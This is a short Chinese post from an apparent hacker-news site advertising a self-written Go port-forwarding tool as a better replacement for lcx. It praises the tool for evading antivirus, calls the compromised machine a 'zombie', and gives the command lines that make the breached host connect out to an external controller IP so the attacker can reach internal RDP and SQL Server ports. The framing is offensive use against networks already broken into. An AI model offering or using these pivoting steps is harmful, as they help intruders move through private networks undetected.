比lcx更好使的内网打洞工具

黑客信息网

  经常有朋友使用lcx,但是由于很多原因可能lcx都不好使,例如下面几点:

  1、linux下不支持lcx,这时只能拿msf出来;

  2、不免杀;

  3、每次内网要重新连接其他主机的时候,都必须重新进去并重新敲打命令 ,并且操作过多时容易被发现。

  最近正好上面那些问题都碰上了,于是没办法就使用golang自己写了一个。我写的这个lcx有以下几个特点:

  1、golang程序跨平台性,甚至嵌入式Linux都支持;

  2、免杀,基本上目前golang程序都不会被识别为病毒;

  3、肉鸡只需操作一次,其他的都交给主控端操作。

  该工具运行界面如下所示:

  lcx1

  为了讲解该工具的功能和使用方法,以下列场景展开介绍:

  lcx2

  前提介绍:

  网络拓扑如上图所示,内网私有,外网无法直接访问内网任意主机,但其中A已经控制了B。

  实现目标:

  攻击者A通过B 连接内网中任意一台计算机(如远程桌面,数据库等)。

  第一步: 在B上面输入指令:

  lcx 111.13.100.92 123

  第二步:假如 A 想连接内网中 C 的远程桌面,那么在A上输入指令:

  lcx 456 123 192.168.10.3 3389

  这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。

  第一步,在B上输入指令:

  lcx 111.13.100.92 123

  第二步,在A上输入指令:

  lcx 1433 123 192.168.10.55 1433

  这时,A只用连接本机1433端口就等于连接内网中(192.168.10.55)的1433端口了。

  暂时只提供windows版本:lcx._g

标签: 渗透测试

发表评论 (已有条评论)

  • 评论列表